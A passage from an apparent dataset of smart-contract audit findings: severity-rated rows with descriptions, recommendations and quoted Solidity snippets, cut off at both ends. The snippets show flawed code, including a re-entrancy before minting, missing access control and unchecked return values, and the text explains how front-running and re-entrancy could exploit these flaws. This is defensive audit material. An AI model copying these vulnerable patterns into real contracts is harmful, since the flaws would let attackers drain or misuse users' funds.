If, for example, an implementation is used that does not revert on error but returns a boolean error indicator instead the caller might falsely continue without the token minted.\\nWe would like to note that the functionality is intended to be used with the provided `ShareToken` and therefore the contract is safe to use assuming `ERC20Mintable.mint` reverts on error. The issue arises if the system is used with a different `ShareToken` implementation that is not implemented in the same way.\\nOpenzeppelin implementation\\n```\\nfunction mint(address account, uint256 amount) public onlyMinter returns (bool) {\\n \\_mint(account, amount);\\n return true;\\n}\\n```\\n\\nCall with unchecked return value\\n```\\nfunction mintShareTokenTo(address guy, uint256 amount) internal {\\n shareToken.mint(guy, amount);\\n}\\n```\\n","Consider wrapping the `mint` statement in a `require` clause, however, this way only tokens that are returning a boolean error indicator are supported. Document the specification requirements for the `ShareToken` and clearly state if the token is expected to revert or return an error indicator.\\nIt should also be documented that the Token exposes a `burn` method that does not adhere to the Openzeppelin `ERC20Burnable` implementation. The `ERC20Burnable` import is unused as noted in issue 6.23.",,"```\\nfunction mint(address account, uint256 amount) public onlyMinter returns (bool) {\\n \\_mint(account, amount);\\n return true;\\n}\\n```\\n" +Perpetual - beginGlobalSettlement can be called multiple times Acknowledged,low,"The system can be put into emergency mode by an admin calling `beginGlobalSettlement` and providing a fixed `settlementPrice`. The method can be invoked even when the contract is already in `SETTLING` (emergency) mode, allowing an admin to selectively adjust the settlement price again. This does not seem to be the intended behavior as calling the method again re-sets the status to `SETTLING`. 
Furthermore, it may affect users' behavior during the `SETTLING` phase.\\n```\\nfunction beginGlobalSettlement(uint256 price) public onlyWhitelistAdmin {\\n require(status != LibTypes.Status.SETTLED, ""already settled"");\\n settlementPrice = price;\\n status = LibTypes.Status.SETTLING;\\n emit BeginGlobalSettlement(price);\\n}\\n```\\n",Emergency mode should only be allowed to be set once,,"```\\nfunction beginGlobalSettlement(uint256 price) public onlyWhitelistAdmin {\\n require(status != LibTypes.Status.SETTLED, ""already settled"");\\n settlementPrice = price;\\n status = LibTypes.Status.SETTLING;\\n emit BeginGlobalSettlement(price);\\n}\\n```\\n" +Exchange - OrderStatus is never used,low,"The enum `OrderStatus` is declared but never used.\\n```\\nenum OrderStatus {EXPIRED, CANCELLED, FILLABLE, FULLY\\_FILLED}\\n```\\n",Resolution\\nThis issue was resolved by removing the unused code.\\nRemove unused code.,,"```\\nenum OrderStatus {EXPIRED, CANCELLED, FILLABLE, FULLY\\_FILLED}\\n```\\n" +LibMath - Inaccurate declaration of _UINT256_MAX,low,`LibMathUnsigned` declares `_UINT256_MAX` as `2^255-1` while this value actually represents `_INT256_MAX`. This appears to just be a naming issue.\\n(UINT256_MAX/2-1 => pos INT256_MAX; 2**256/2-1==2**255-1)\\n```\\nlibrary LibMathUnsigned {\\n uint256 private constant \\_WAD = 10\\*\\*18;\\n uint256 private constant \\_UINT256\\_MAX = 2\\*\\*255 - 1;\\n```\\n,Rename `_UINT256_MAX` to `_INT256MAX` or `_SIGNED_INT256MAX`.,,```\\nlibrary LibMathUnsigned {\\n uint256 private constant \\_WAD = 10\\*\\*18;\\n uint256 private constant \\_UINT256\\_MAX = 2\\*\\*255 - 1;\\n```\\n +LibMath - inconsistent assertion text and improve representation of literals with many digits Acknowledged,low,"The assertion below states that `logE only accepts v <= 1e22 * 1e18` while the argument name is `x`. 
In addition to that we suggest representing large literals in scientific notation.\\n```\\nfunction wln(int256 x) internal pure returns (int256) {\\n require(x > 0, ""logE of negative number"");\\n require(x <= 10000000000000000000000000000000000000000, ""logE only accepts v <= 1e22 \\* 1e18""); // in order to prevent using safe-math\\n int256 r = 0;\\n uint8 extra\\_digits = longer\\_digits - fixed\\_digits;\\n```\\n",Update the inconsistent assertion text `v` -> `x` and represent large literals in scientific notation as they are otherwise difficult to read and review.,,"```\\nfunction wln(int256 x) internal pure returns (int256) {\\n require(x > 0, ""logE of negative number"");\\n require(x <= 10000000000000000000000000000000000000000, ""logE only accepts v <= 1e22 \\* 1e18""); // in order to prevent using safe-math\\n int256 r = 0;\\n uint8 extra\\_digits = longer\\_digits - fixed\\_digits;\\n```\\n" +LibMath - roundHalfUp returns unfinished result,low,"The method `LibMathSigned.roundHalfUp(int `x`, int y)` returns the value `x` rounded up to the base `y`. The method suggests that the result is the rounded value while that's not actually true. The result for a positive `x` is `x` + base/2 and `x` - base/2 for negative values. The rounding is not yet finished as this would require a final division by base `y` to manifest the rounding.\\nIt is assumed that the final rounding step is not executed for performance reasons. However, this might easily introduce errors when the caller assumes the result is rounded for base while it is not.\\n`roundHalfUp(-4700, 1000) = -4700` instead of `5000`\\n`roundHalfUp(4700, 1000) = 4700` instead of `5000`\\n```\\n// ROUND\\_HALF\\_UP rule helper. 
0.5 ≈ 1, 0.4 ≈ 0, -0.5 ≈ -1, -0.4 ≈ 0\\nfunction roundHalfUp(int256 x, int256 y) internal pure returns (int256) {\\n require(y > 0, ""roundHalfUp only supports y > 0"");\\n if (x >= 0) {\\n return add(x, y / 2);\\n }\\n return sub(x, y / 2);\\n}\\n```\\n","We have verified the current code-base and the callers for `roundHalfUp` are correctly finishing the rounding step. However, it is recommended to finish the rounding within the method or document this behavior to prevent errors caused by code that falsely assumes that the returned value finished rounding.",,"```\\n// ROUND\\_HALF\\_UP rule helper. 0.5 ≈ 1, 0.4 ≈ 0, -0.5 ≈ -1, -0.4 ≈ 0\\nfunction roundHalfUp(int256 x, int256 y) internal pure returns (int256) {\\n require(y > 0, ""roundHalfUp only supports y > 0"");\\n if (x >= 0) {\\n return add(x, y / 2);\\n }\\n return sub(x, y / 2);\\n}\\n```\\n" +LibMath/LibOrder - unused named return value,low,"The following methods declare a named return value but explicitly return a value instead. The named return value is not used.\\n`LibMathSigned.min()`\\n`LibMathSigned.max()`\\n`LibMathUnsigned.min()`\\n`LibMathUnsigned.max()`\\n`LibOrder.getOrderHash()`\\n`LibOrder.hashOrder()`\\n```\\nfunction min(int256 x, int256 y) internal pure returns (int256 z) {\\n return x <= y ? x : y;\\n}\\n\\nfunction max(int256 x, int256 y) internal pure returns (int256 z) {\\n return x >= y ? x : y;\\n}\\n```\\n\\n```\\nfunction min(uint256 x, uint256 y) internal pure returns (uint256 z) {\\n return x <= y ? x : y;\\n}\\n\\nfunction max(uint256 x, uint256 y) internal pure returns (uint256 z) {\\n return x >= y ? 
x : y;\\n}\\n```\\n\\n```\\nfunction getOrderHash(Order memory order) internal pure returns (bytes32 orderHash) {\\n orderHash = LibEIP712.hashEIP712Message(hashOrder(order));\\n return orderHash;\\n}\\n```\\n\\n```\\nfunction hashOrder(Order memory order) internal pure returns (bytes32 result) {\\n bytes32 orderType = EIP712\\_ORDER\\_TYPE;\\n // solium-disable-next-line security/no-inline-assembly\\n assembly {\\n let start := sub(order, 32)\\n let tmp := mload(start)\\n mstore(start, orderType)\\n result := keccak256(start, 224)\\n mstore(start, tmp)\\n }\\n return result;\\n}\\n```\\n",Remove the named return value and explicitly return the value.,,"```\\nfunction min(int256 x, int256 y) internal pure returns (int256 z) {\\n return x <= y ? x : y;\\n}\\n\\nfunction max(int256 x, int256 y) internal pure returns (int256 z) {\\n return x >= y ? x : y;\\n}\\n```\\n" +Commented code exists in BMath,low,"```\\nuint tokenInRatio = bdiv(newTokenBalanceIn, tokenBalanceIn);\\n\\n// uint newPoolSupply = (ratioTi ^ weightTi) \\* poolSupply;\\nuint poolRatio = bpow(tokenInRatio, normalizedWeight);\\n```\\n\\n```\\nuint normalizedWeight = bdiv(tokenWeightOut, totalWeight);\\n// charge exit fee on the pool token side\\n// pAiAfterExitFee = pAi\\*(1-exitFee)\\nuint poolAmountInAfterExitFee = bmul(poolAmountIn, bsub(BONE, EXIT\\_FEE));\\n```\\n\\nAnd many more examples.","Remove the commented code, or address them properly. 
If the code is related to exit fee, which is considered to be 0 in this version, this style should be consistent in other contracts as well.",,"```\\nuint tokenInRatio = bdiv(newTokenBalanceIn, tokenBalanceIn);\\n\\n// uint newPoolSupply = (ratioTi ^ weightTi) \\* poolSupply;\\nuint poolRatio = bpow(tokenInRatio, normalizedWeight);\\n```\\n" +Max weight requirement in rebind is inaccurate,low,"`BPool.rebind` enforces `MIN_WEIGHT` and `MAX_WEIGHT` bounds on the passed-in `denorm` value:\\n```\\nfunction rebind(address token, uint balance, uint denorm)\\n public\\n \\_logs\\_\\n \\_lock\\_\\n{\\n\\n require(msg.sender == \\_controller, ""ERR\\_NOT\\_CONTROLLER"");\\n require(\\_records[token].bound, ""ERR\\_NOT\\_BOUND"");\\n require(!\\_finalized, ""ERR\\_IS\\_FINALIZED"");\\n\\n require(denorm >= MIN\\_WEIGHT, ""ERR\\_MIN\\_WEIGHT"");\\n require(denorm <= MAX\\_WEIGHT, ""ERR\\_MAX\\_WEIGHT"");\\n require(balance >= MIN\\_BALANCE, ""ERR\\_MIN\\_BALANCE"");\\n```\\n
The sum of the weights of all tokens must not be greater than `50 BONE`.\\nThis implies that a weight of `50 BONE` for any single token is incorrect, given that at least one other token must be present.","`MAX_WEIGHT` for any single token should be `MAX_WEIGHT` - MIN_WEIGHT, or `49 BONE`.",,"```\\nfunction rebind(address token, uint balance, uint denorm)\\n public\\n \\_logs\\_\\n \\_lock\\_\\n{\\n\\n require(msg.sender == \\_controller, ""ERR\\_NOT\\_CONTROLLER"");\\n require(\\_records[token].bound, ""ERR\\_NOT\\_BOUND"");\\n require(!\\_finalized, ""ERR\\_IS\\_FINALIZED"");\\n\\n require(denorm >= MIN\\_WEIGHT, ""ERR\\_MIN\\_WEIGHT"");\\n require(denorm <= MAX\\_WEIGHT, ""ERR\\_MAX\\_WEIGHT"");\\n require(balance >= MIN\\_BALANCE, ""ERR\\_MIN\\_BALANCE"");\\n```\\n" +Test code present in the code base,medium,"Test code are present in the code base. This is mainly a reminder to fix those before production.\\n`rescuerAddress` and `freezerAddress` are not even in the function arguments.\\n```\\nwhitelistingAddress = \\_whitelistingAddress;\\nprojectAddress = \\_projectAddress;\\nfreezerAddress = \\_projectAddress; // TODO change, here only for testing\\nrescuerAddress = \\_projectAddress; // TODO change, here only for testing\\n```\\n",Resolution\\nFixed in lukso-network/[email protected]edb880c.\\nMake sure all the variable assignments are ready for production before deployment to production.,,"```\\nwhitelistingAddress = \\_whitelistingAddress;\\nprojectAddress = \\_projectAddress;\\nfreezerAddress = \\_projectAddress; // TODO change, here only for testing\\nrescuerAddress = \\_projectAddress; // TODO change, here only for testing\\n```\\n" +frozenPeriod is subtracted twice for calculating the current price,medium,"If the contract had been frozen, the current stage price will calculate the price by subtracting the `frozenPeriod` twice and result in wrong calculation.\\n`getCurrentBlockNumber()` subtracts `frozenPeriod` once, and then `getStageAtBlock()` will also 
subtract the same number again.\\n```\\nfunction getCurrentStage() public view returns (uint8) {\\n return getStageAtBlock(getCurrentBlockNumber());\\n}\\n```\\n\\n```\\nfunction getCurrentBlockNumber() public view returns (uint256) {\\n return uint256(block.number)\\n .sub(frozenPeriod); // make sure we deduct any frozenPeriod from calculations\\n}\\n```\\n\\n```\\nfunction getStageAtBlock(uint256 \\_blockNumber) public view returns (uint8) {\\n\\n uint256 blockNumber = \\_blockNumber.sub(frozenPeriod); // adjust the block by the frozen period\\n```\\n",Resolution\\nFound in parallel to the audit team and has been mitigated in lukso-network/[email protected]ebc4bce . The issue was further simplified by adding `getCurrentEffectiveBlockNumber()` in lukso-network/[email protected]e4c9ed5 to remove ambiguity when calculating current block number.\\nMake sure `frozenPeriod` calculation is done correctly. It could be solved by renaming `getCurrentBlockNumber()` to reflect the calculation done inside the function.\\ne.g. :\\n`getCurrentBlockNumber()` : gets current block number\\n`getCurrentEffectiveBlockNumber()` : calculates the effective block number deducting `frozenPeriod`,,```\\nfunction getCurrentStage() public view returns (uint8) {\\n return getStageAtBlock(getCurrentBlockNumber());\\n}\\n```\\n +Gold order size should be limited,high,"When a user submits an order to buy gold cards, it's possible to buy a huge amount of cards. 
`_commit` function uses less gas than `mineGolds`, which means that the user can successfully commit to buying this amount of cards and when it's time to collect them, `mineGolds` function may run out of gas because it iterates over all card IDs and mints them:\\n```\\n// Mint gold cards\\nskyweaverAssets.batchMint(\\_order.cardRecipient, \\_ids, amounts, """");\\n```\\n",Resolution\\nAddressed in horizon-games/SkyWeaver-contracts#9 by adding a limit for cold cards amount in one order.\\nLimit a maximum gold card amount in one order.,,"```\\n// Mint gold cards\\nskyweaverAssets.batchMint(\\_order.cardRecipient, \\_ids, amounts, """");\\n```\\n" +Price and refund changes may cause failures,high,"Price and refund for gold cards are used in 3 different places: commit, mint, refund.\\nWeave tokens spent during the commit phase\\n```\\nfunction \\_commit(uint256 \\_weaveAmount, GoldOrder memory \\_order)\\n internal\\n{\\n // Check if weave sent is sufficient for order\\n uint256 total\\_cost = \\_order.cardAmount.mul(goldPrice).add(\\_order.feeAmount);\\n uint256 refund\\_amount = \\_weaveAmount.sub(total\\_cost); // Will throw if insufficient amount received\\n```\\n\\nbut they are burned `rngDelay` blocks after\\n```\\n// Burn the non-refundable weave\\nuint256 weave\\_to\\_burn = (\\_order.cardAmount.mul(goldPrice)).sub(\\_order.cardAmount.mul(goldRefund));\\nweaveContract.burn(weaveID, weave\\_to\\_burn);\\n```\\n\\nIf the price is increased between these transactions, mining cards may fail because it should burn more `weave` tokens than there are tokens in the smart contract. 
Even if there are enough tokens during this particular transaction, someone may fail to melt a gold card later.\\nIf the price is decreased, some `weave` tokens will be stuck in the contract forever without being burned.",Store `goldPrice` and `goldRefund` in `GoldOrder`.,,"```\\nfunction \\_commit(uint256 \\_weaveAmount, GoldOrder memory \\_order)\\n internal\\n{\\n // Check if weave sent is sufficient for order\\n uint256 total\\_cost = \\_order.cardAmount.mul(goldPrice).add(\\_order.feeAmount);\\n uint256 refund\\_amount = \\_weaveAmount.sub(total\\_cost); // Will throw if insufficient amount received\\n```\\n" +Re-entrancy attack allows to buy EternalHeroes cheaper,high,"When buying eternal heroes in `_buy` function of `EternalHeroesFactory` contract, a buyer can do re-entracy before items are minted.\\n```\\nuint256 refundAmount = \\_arcAmount.sub(total\\_cost);\\nif (refundAmount > 0) {\\n arcadeumCoin.safeTransferFrom(address(this), \\_recipient, arcadeumCoinID, refundAmount, """");\\n}\\n\\n// Mint tokens to recipient\\nfactoryManager.batchMint(\\_recipient, \\_ids, amounts\\_to\\_mint, """");\\n```\\n\\nSince price should increase after every `N` items are minted, it's possible to buy more items with the old price.",Add re-entrancy protection or mint items before sending the refund.,,"```\\nuint256 refundAmount = \\_arcAmount.sub(total\\_cost);\\nif (refundAmount > 0) {\\n arcadeumCoin.safeTransferFrom(address(this), \\_recipient, arcadeumCoinID, refundAmount, """");\\n}\\n\\n// Mint tokens to recipient\\nfactoryManager.batchMint(\\_recipient, \\_ids, amounts\\_to\\_mint, """");\\n```\\n" +Supply limitation misbehaviors,medium,"In `SWSupplyManager` contract, the `owner` can limit supply for any token ID by setting maxSupply:\\n```\\nfunction setMaxSupplies(uint256[] calldata \\_ids, uint256[] calldata \\_newMaxSupplies) external onlyOwner() {\\n require(\\_ids.length == \\_newMaxSupplies.length, ""SWSupplyManager#setMaxSupply: 
INVALID\\_ARRAYS\\_LENGTH"");\\n\\n // Can only \\*decrease\\* a max supply\\n // Can't set max supply back to 0\\n for (uint256 i = 0; i < \\_ids.length; i++ ) {\\n if (maxSupply[\\_ids[i]] > 0) {\\n require(\\n 0 < \\_newMaxSupplies[i] && \\_newMaxSupplies[i] < maxSupply[\\_ids[i]],\\n ""SWSupplyManager#setMaxSupply: INVALID\\_NEW\\_MAX\\_SUPPLY""\\n );\\n }\\n maxSupply[\\_ids[i]] = \\_newMaxSupplies[i];\\n }\\n\\n emit MaxSuppliesChanged(\\_ids, \\_newMaxSupplies);\\n}\\n```\\n\\nThe problem is that you can set `maxSupply` that is lower than `currentSupply`, which would be an unexpected state to have.\\nAlso, if some tokens are burned, their `currentSupply` is not decreasing:\\n```\\nfunction burn(\\n uint256 \\_id,\\n uint256 \\_amount)\\n external\\n{\\n \\_burn(msg.sender, \\_id, \\_amount);\\n}\\n```\\n\\nThis unexpected behaviour may lead to burning all of the tokens without being able to mint more.",Properly track `currentSupply` by modifying it in `burn` function. Consider having a following restriction `require(_newMaxSupplies[i] > currentSupply[_ids[i]])` in `setMaxSupplies` function.,,"```\\nfunction setMaxSupplies(uint256[] calldata \\_ids, uint256[] calldata \\_newMaxSupplies) external onlyOwner() {\\n require(\\_ids.length == \\_newMaxSupplies.length, ""SWSupplyManager#setMaxSupply: INVALID\\_ARRAYS\\_LENGTH"");\\n\\n // Can only \\*decrease\\* a max supply\\n // Can't set max supply back to 0\\n for (uint256 i = 0; i < \\_ids.length; i++ ) {\\n if (maxSupply[\\_ids[i]] > 0) {\\n require(\\n 0 < \\_newMaxSupplies[i] && \\_newMaxSupplies[i] < maxSupply[\\_ids[i]],\\n ""SWSupplyManager#setMaxSupply: INVALID\\_NEW\\_MAX\\_SUPPLY""\\n );\\n }\\n maxSupply[\\_ids[i]] = \\_newMaxSupplies[i];\\n }\\n\\n emit MaxSuppliesChanged(\\_ids, \\_newMaxSupplies);\\n}\\n```\\n" +importScore() in IexecMaintenanceDelegate can be used to wrongfully reset worker scores Acknowledged,medium,"The import of worker scores from the previous PoCo system deployed on chain is 
made to be asynchronous. And, even though the pull pattern usually makes a system much more resilient, in this case, it opens up the possibility for an attack that undermines the trust-based game-theoretical balance the PoCo system relies on. As can be seen in the following function:\\n```\\nfunction importScore(address \\_worker)\\nexternal override\\n{\\n require(!m\\_v3\\_scoreImported[\\_worker], ""score-already-imported"");\\n m\\_workerScores[\\_worker] = m\\_workerScores[\\_worker].max(m\\_v3\\_iexecHub.viewScore(\\_worker));\\n m\\_v3\\_scoreImported[\\_worker] = true;\\n}\\n```\\n\\nA motivated attacker could attack the system providing bogus results for computation tasks therefore reducing his own reputation (mirrored by the low worker score that would follow).\\nAfter the fact, the attacker could reset its score to the previous high value attained in the previously deployed PoCo system (v3) and undo all the wrongdoings he had done at no reputational cost.","Resolution\\nUpdate from the iExec team:\\nIn order to perform this attack, one would first have to gain reputation on the new version, and lose it. They would then be able to restore its score from the old version.\\nWe feel the risk is acceptable for a few reasons:\\nIt can only be done once per worker\\nConsidering the score dynamics discussed in the “Trust in the PoCo” document, it is more interesting for a worker to import its reputation in the beginning rather then creating a new one, since bad contributions only remove part of the reputation\\nOnly a handful of workers have reputation in the old system (180), and their score is low (average 7, max 22)\\nWe might force the import all 180 workers with reputation >0. A script to identify the relevant addresses is already available.\\nCheck that each worker interacting with the PoCo system has already imported his score. 
Otherwise import it synchronously with a call at the time of their first interaction.",,"```\\nfunction importScore(address \\_worker)\\nexternal override\\n{\\n require(!m\\_v3\\_scoreImported[\\_worker], ""score-already-imported"");\\n m\\_workerScores[\\_worker] = m\\_workerScores[\\_worker].max(m\\_v3\\_iexecHub.viewScore(\\_worker));\\n m\\_v3\\_scoreImported[\\_worker] = true;\\n}\\n```\\n" +Domain separator in iExecMaintenanceDelegate has a wrong version field Acknowledged,medium,"The domain separator used to comply with the EIP712 standard in `iExecMaintenanceDelegate` has a wrong version field.\\n```\\nfunction \\_domain()\\ninternal view returns (IexecLibOrders\\_v5.EIP712Domain memory)\\n{\\n return IexecLibOrders\\_v5.EIP712Domain({\\n name: ""iExecODB""\\n , version: ""3.0-alpha""\\n , chainId: \\_chainId()\\n , verifyingContract: address(this)\\n });\\n}\\n```\\n\\nIn the above snippet we can see the code is still using the version field from an old version of the PoCo protocol, `""3.0-alpha""`.","Resolution\\nIssue was fixed in iExecBlockchainComputing/[email protected]ebee370\\nChange the version field to: `""5.0-alpha""`",,"```\\nfunction \\_domain()\\ninternal view returns (IexecLibOrders\\_v5.EIP712Domain memory)\\n{\\n return IexecLibOrders\\_v5.EIP712Domain({\\n name: ""iExecODB""\\n , version: ""3.0-alpha""\\n , chainId: \\_chainId()\\n , verifyingContract: address(this)\\n });\\n}\\n```\\n" +The updateContract() method in ERC1538UpdateDelegate is incorrectly implemented,low,"The `updateContract()` method in `ERC1538UpdateDelegate` does not behave as intended for some specific streams of bytes (meant to be parsed as function signatures).\\nThe mentioned function takes as input, among other things, a `string` (which is, canonically, a dynamically-sized `bytes` array) and tries to parse it as a conjunction of function signatures.\\nAs is evident in:\\n```\\nif (char == 0x3B) // 0x3B = ';'\\n```\\n\\nInside the function, `;` is being used as a 
“reserved” character, serving as a delimiter between each function signature.\\nHowever, if two semicolons are used in succession, the second one will not be checked and will be made part of the function signature being sent into the `_setFunc()` method.\\nExample of faulty input\\n`someFunc;;someOtherFuncWithSemiColon;`",Resolution\\nIssue was fixed in iExecBlockchainComputing/[email protected]e6be083\\nReplace the line that increases the `pos` counter at the end of the function:\\n```\\nstart = ++pos;\\n```\\n\\nWIth this line of code:\\n`start = pos + 1;`,,```\\nif (char == 0x3B) // 0x3B = ';'\\n```\\n +TokenStaking.recoverStake allows instant stake undelegation,high,"`TokenStaking.recoverStake` is used to recover stake that has been designated to be undelegated. It contains a single check to ensure that the undelegation period has passed:\\n```\\nfunction recoverStake(address \\_operator) public {\\n uint256 operatorParams = operators[\\_operator].packedParams;\\n require(\\n block.number > operatorParams.getUndelegationBlock().add(undelegationPeriod),\\n ""Can not recover stake before undelegation period is over.""\\n );\\n```\\n\\nHowever, if an undelegation period is never set, this will always return true, allowing any operator to instantly undelegate stake at any time.",Require that the undelegation period is nonzero before allowing an operator to recover stake.,,"```\\nfunction recoverStake(address \\_operator) public {\\n uint256 operatorParams = operators[\\_operator].packedParams;\\n require(\\n block.number > operatorParams.getUndelegationBlock().add(undelegationPeriod),\\n ""Can not recover stake before undelegation period is over.""\\n );\\n```\\n" +tbtc - No access control in TBTCSystem.requestNewKeep,high,"`TBTCSystem.requestNewKeep` is used by each new `Deposit` contract on creation. It calls `BondedECDSAKeepFactory.openKeep`, which sets the `Deposit` contract as the “owner,” a permissioned role within the created keep. 
`openKeep` also automatically allocates bonds from members registered to the application. The “application” from which member bonds are allocated is the tbtc system itself.\\nBecause `requestNewKeep` has no access controls, anyone can request that a keep be opened with `msg.sender` as the “owner,” and arbitrary signing threshold values:\\n```\\n/// @notice Request a new keep opening.\\n/// @param \\_m Minimum number of honest keep members required to sign.\\n/// @param \\_n Number of members in the keep.\\n/// @return Address of a new keep.\\nfunction requestNewKeep(uint256 \\_m, uint256 \\_n, uint256 \\_bond)\\n external\\n payable\\n returns (address)\\n{\\n IBondedECDSAKeepVendor \\_keepVendor = IBondedECDSAKeepVendor(keepVendor);\\n IBondedECDSAKeepFactory \\_keepFactory = IBondedECDSAKeepFactory(\\_keepVendor.selectFactory());\\n return \\_keepFactory.openKeep.value(msg.value)(\\_n, \\_m, msg.sender, \\_bond);\\n}\\n```\\n\\nGiven that the owner of a keep is able to seize signer bonds, close the keep, and more, having control of this role could be detrimental to group members.","Resolution\\nIssue addressed in keep-network/tbtc#514. Each call to `requestNewKeep` makes a check that `uint(msg.sender)` is an existing `TBTCDepositToken`. 
Because these tokens are only minted in `DepositFactory`, `msg.sender` would have to be one of the cloned deposit contracts.\\nAdd access control to `requestNewKeep`, so that it can only be called as a part of the `Deposit` creation and initialization process.",,"```\\n/// @notice Request a new keep opening.\\n/// @param \\_m Minimum number of honest keep members required to sign.\\n/// @param \\_n Number of members in the keep.\\n/// @return Address of a new keep.\\nfunction requestNewKeep(uint256 \\_m, uint256 \\_n, uint256 \\_bond)\\n external\\n payable\\n returns (address)\\n{\\n IBondedECDSAKeepVendor \\_keepVendor = IBondedECDSAKeepVendor(keepVendor);\\n IBondedECDSAKeepFactory \\_keepFactory = IBondedECDSAKeepFactory(\\_keepVendor.selectFactory());\\n return \\_keepFactory.openKeep.value(msg.value)(\\_n, \\_m, msg.sender, \\_bond);\\n}\\n```\\n" +Unpredictable behavior due to front running or general bad timing,high,"In a number of cases, administrators of contracts can update or upgrade things in the system without warning. This has the potential to violate a security goal of the system.\\nSpecifically, privileged roles could use front running to make malicious changes just ahead of incoming transactions, or purely accidental negative effects could occur due to unfortunate timing of changes.\\nSome instances of this are more important than others, but in general users of the system should have assurances about the behavior of the action they're about to take.\\nSystem Parameters\\nThe owner of the `TBTCSystem` contract can change system parameters at any time with changes taking effect immediately.\\n`setSignerFeeDivisor` - stored in the deposit contract when creating a new deposit. emits an event.\\n`setLotSizes` - stored in the deposit contract when creating a new deposit. emits an event.\\n`setCollateralizationThresholds` - stored in the deposit contract when creating a new deposit. 
emits an event.\\nThis also opens up an opportunity for malicious owner to:\\ninterfere with other participants deposit creation attempts (front-running transactions)\\ncraft a series of transactions that allow the owner to set parameters that are more beneficial to them, then create a deposit and reset the parameters to the systems' initial settings.\\n```\\n/// @notice Set the system signer fee divisor.\\n/// @param \\_signerFeeDivisor The signer fee divisor.\\nfunction setSignerFeeDivisor(uint256 \\_signerFeeDivisor)\\n external onlyOwner\\n{\\n require(\\_signerFeeDivisor > 9, ""Signer fee divisor must be greater than 9, for a signer fee that is <= 10%."");\\n signerFeeDivisor = \\_signerFeeDivisor;\\n emit SignerFeeDivisorUpdated(\\_signerFeeDivisor);\\n}\\n```\\n\\nUpgradables\\nThe proxy pattern used in many places throughout the system allows the operator to set a new implementation which takes effect immediately.\\n```\\n/\\*\\*\\n \\* @dev Upgrade current implementation.\\n \\* @param \\_implementation Address of the new implementation contract.\\n \\*/\\nfunction upgradeTo(address \\_implementation)\\n public\\n onlyOwner\\n{\\n address currentImplementation = implementation();\\n require(\\_implementation != address(0), ""Implementation address can't be zero."");\\n require(\\_implementation != currentImplementation, ""Implementation address must be different from the current one."");\\n setImplementation(\\_implementation);\\n emit Upgraded(\\_implementation);\\n}\\n```\\n\\n```\\n/// @notice Upgrades the current vendor implementation.\\n/// @param \\_implementation Address of the new vendor implementation contract.\\nfunction upgradeTo(address \\_implementation) public onlyOwner {\\n address currentImplementation = implementation();\\n require(\\n \\_implementation != address(0),\\n ""Implementation address can't be zero.""\\n );\\n require(\\n \\_implementation != currentImplementation,\\n ""Implementation address must be different from the current 
one.""\\n );\\n setImplementation(\\_implementation);\\n emit Upgraded(\\_implementation);\\n}\\n```\\n\\nRegistry\\n```\\nfunction registerFactory(address payable \\_factory) external onlyOperatorContractUpgrader {\\n require(\\_factory != address(0), ""Incorrect factory address"");\\n require(\\n registry.isApprovedOperatorContract(\\_factory),\\n ""Factory contract is not approved""\\n );\\n keepFactory = \\_factory;\\n}\\n```\\n","The underlying issue is that users of the system can't be sure what the behavior of a function call will be, and this is because the behavior can change at any time.\\nWe recommend giving the user advance notice of changes with a time lock. For example, make all upgrades require two steps with a mandatory time window between them. The first step merely broadcasts to users that a particular change is coming, and the second step commits that change after a suitable waiting period.",,"```\\n/// @notice Set the system signer fee divisor.\\n/// @param \\_signerFeeDivisor The signer fee divisor.\\nfunction setSignerFeeDivisor(uint256 \\_signerFeeDivisor)\\n external onlyOwner\\n{\\n require(\\_signerFeeDivisor > 9, ""Signer fee divisor must be greater than 9, for a signer fee that is <= 10%."");\\n signerFeeDivisor = \\_signerFeeDivisor;\\n emit SignerFeeDivisorUpdated(\\_signerFeeDivisor);\\n}\\n```\\n" +keep-core - reportRelayEntryTimeout creates an incentive for nodes to race for rewards potentially wasting gas and it creates an opportunity for front-running,high,"The incentive on `reportRelayEntryTimeout` for being rewarded with 5% of the seized amount creates an incentive to call the method but might also kick off a race for front-running this call. 
This method is being called from the keep node which is unlikely to adjust the gasPrice and might always lose the race against a front-running bot collecting rewards for all timeouts and fraud proofs (issue 5.7)\\n```\\n/\\*\\*\\n \\* @dev Function used to inform about the fact the currently ongoing\\n \\* new relay entry generation operation timed out. As a result, the group\\n \\* which was supposed to produce a new relay entry is immediately\\n \\* terminated and a new group is selected to produce a new relay entry.\\n \\* All members of the group are punished by seizing minimum stake of\\n \\* their tokens. The submitter of the transaction is rewarded with a\\n \\* tattletale reward which is limited to min(1, 20 / group\\_size) of the\\n \\* maximum tattletale reward.\\n \\*/\\nfunction reportRelayEntryTimeout() public {\\n require(hasEntryTimedOut(), ""Entry did not time out"");\\n groups.reportRelayEntryTimeout(signingRequest.groupIndex, groupSize, minimumStake);\\n\\n // We could terminate the last active group. If that's the case,\\n // do not try to execute signing again because there is no group\\n // which can handle it.\\n if (numberOfGroups() > 0) {\\n signRelayEntry(\\n signingRequest.relayRequestId,\\n signingRequest.previousEntry,\\n signingRequest.serviceContract,\\n signingRequest.entryVerificationAndProfitFee,\\n signingRequest.callbackFee\\n );\\n }\\n}\\n```\\n",Make sure that `reportRelayEntryTimeout` throws as early as possible if the group was previously terminated (isGroupTerminated) to avoid that keep-nodes spend gas on a call that will fail. Depending on the reward for calling out the timeout this might create a front-running opportunity that cannot be resolved.,,"```\\n/\\*\\*\\n \\* @dev Function used to inform about the fact the currently ongoing\\n \\* new relay entry generation operation timed out. 
As a result, the group\\n \\* which was supposed to produce a new relay entry is immediately\\n \\* terminated and a new group is selected to produce a new relay entry.\\n \\* All members of the group are punished by seizing minimum stake of\\n \\* their tokens. The submitter of the transaction is rewarded with a\\n \\* tattletale reward which is limited to min(1, 20 / group\\_size) of the\\n \\* maximum tattletale reward.\\n \\*/\\nfunction reportRelayEntryTimeout() public {\\n require(hasEntryTimedOut(), ""Entry did not time out"");\\n groups.reportRelayEntryTimeout(signingRequest.groupIndex, groupSize, minimumStake);\\n\\n // We could terminate the last active group. If that's the case,\\n // do not try to execute signing again because there is no group\\n // which can handle it.\\n if (numberOfGroups() > 0) {\\n signRelayEntry(\\n signingRequest.relayRequestId,\\n signingRequest.previousEntry,\\n signingRequest.serviceContract,\\n signingRequest.entryVerificationAndProfitFee,\\n signingRequest.callbackFee\\n );\\n }\\n}\\n```\\n" +keep-core - reportUnauthorizedSigning fraud proof is not bound to reporter and can be front-run,high,"An attacker can monitor `reportUnauthorizedSigning()` for fraud reports and attempt to front-run the original call in an effort to be the first one reporting the fraud and be rewarded 5% of the total seized amount.\\n```\\n/\\*\\*\\n 